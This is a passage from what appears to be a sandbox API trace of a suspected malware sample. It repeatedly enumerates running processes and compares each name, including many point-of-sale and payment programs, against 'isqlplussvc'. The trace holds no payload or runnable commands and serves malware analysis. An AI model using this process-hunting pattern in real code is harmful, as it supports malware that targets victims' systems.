lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0093.708] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0093.708] StrStrIA (lpFirst="thunderbird.exe", lpSrch="isqlplussvc") returned 0x0 [0093.708] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0093.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.709] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35684c0 [0093.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x35684c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0093.709] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0093.709] StrStrIA (lpFirst="totalcmd.exe", lpSrch="isqlplussvc") returned 0x0 [0093.710] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0093.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.711] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568448 [0093.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x3568448, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0093.711] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0093.711] StrStrIA (lpFirst="trillian.exe", lpSrch="isqlplussvc") returned 0x0 [0093.711] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0093.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.712] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568550 [0093.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x3568550, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0093.712] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0093.712] StrStrIA (lpFirst="webdrive.exe", lpSrch="isqlplussvc") returned 0x0 [0093.712] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0093.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0093.713] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35686e8 [0093.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x35686e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0093.713] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0093.713] StrStrIA (lpFirst="whatsapp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.713] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0093.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.714] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568640 [0093.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x3568640, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0093.714] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0093.714] StrStrIA (lpFirst="winscp.exe", lpSrch="isqlplussvc") returned 0x0 [0093.714] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0093.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.715] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569648 [0093.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x3569648, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0093.715] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0093.715] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="isqlplussvc") returned 0x0 [0093.716] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0093.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.717] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3569748 [0093.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x3569748, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0093.717] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0093.717] StrStrIA (lpFirst="active-charge.exe", lpSrch="isqlplussvc") returned 0x0 [0093.717] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0093.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.718] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568580 [0093.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x3568580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.718] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0093.718] StrStrIA (lpFirst="accupos.exe", lpSrch="isqlplussvc") returned 0x0 [0093.718] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0093.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.719] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568460 [0093.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x3568460, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0093.719] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0093.719] StrStrIA (lpFirst="afr38.exe", lpSrch="isqlplussvc") returned 0x0 [0093.719] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0093.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.720] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568490 [0093.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x3568490, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0093.720] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0093.720] StrStrIA (lpFirst="aldelo.exe", lpSrch="isqlplussvc") returned 0x0 [0093.720] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0093.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0093.722] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x35684a8 [0093.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x35684a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0093.722] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0093.722] StrStrIA (lpFirst="ccv_server.exe", lpSrch="isqlplussvc") returned 0x0 [0093.722] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0093.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0093.723] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x3569588 [0093.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x3569588, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0093.723] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0093.723] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="isqlplussvc") returned 0x0 [0093.723] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0093.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0093.724] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3569788 [0093.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x3569788, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0093.724] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0093.724] StrStrIA (lpFirst="creditservice.exe", lpSrch="isqlplussvc") returned 0x0 [0093.724] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0093.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.725] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568568 [0093.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3568568, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0093.725] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0093.725] StrStrIA (lpFirst="edcsvr.exe", lpSrch="isqlplussvc") returned 0x0 [0093.725] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0093.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.726] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568598 [0093.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3568598, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0093.726] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0093.726] StrStrIA (lpFirst="fpos.exe", lpSrch="isqlplussvc") returned 0x0 [0093.726] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0093.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.727] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35685c8 [0093.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x35685c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0093.727] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0093.727] StrStrIA (lpFirst="isspos.exe", lpSrch="isqlplussvc") returned 0x0 [0093.727] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0093.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0093.728] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569628 [0093.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x3569628, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0093.728] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0093.728] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="isqlplussvc") returned 0x0 [0093.728] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0093.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.729] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568610 [0093.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3568610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0093.729] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0093.729] StrStrIA (lpFirst="omnipos.exe", lpSrch="isqlplussvc") returned 0x0 [0093.729] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0093.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.730] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35685f8 [0093.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x35685f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0093.730] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0093.730] StrStrIA (lpFirst="spcwin.exe", lpSrch="isqlplussvc") returned 0x0 [0093.730] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0093.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0093.731] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3569448 [0093.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3569448, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0093.731] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0093.731] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="isqlplussvc") returned 0x0 [0093.731] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0093.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.732] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3568a18 [0093.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3568a18, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0093.732] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0093.732] StrStrIA (lpFirst="utg2.exe", lpSrch="isqlplussvc") returned 0x0 [0093.732] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0093.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0093.733] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3568850 [0093.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3568850, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0093.733] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0093.733] StrStrIA (lpFirst="saying.exe", lpSrch="isqlplussvc") returned 0x0 [0093.733] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0093.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0093.734] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35687f0 [0093.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x35687f0, cbMultiByte=9, lpDefaultChar=0x0, 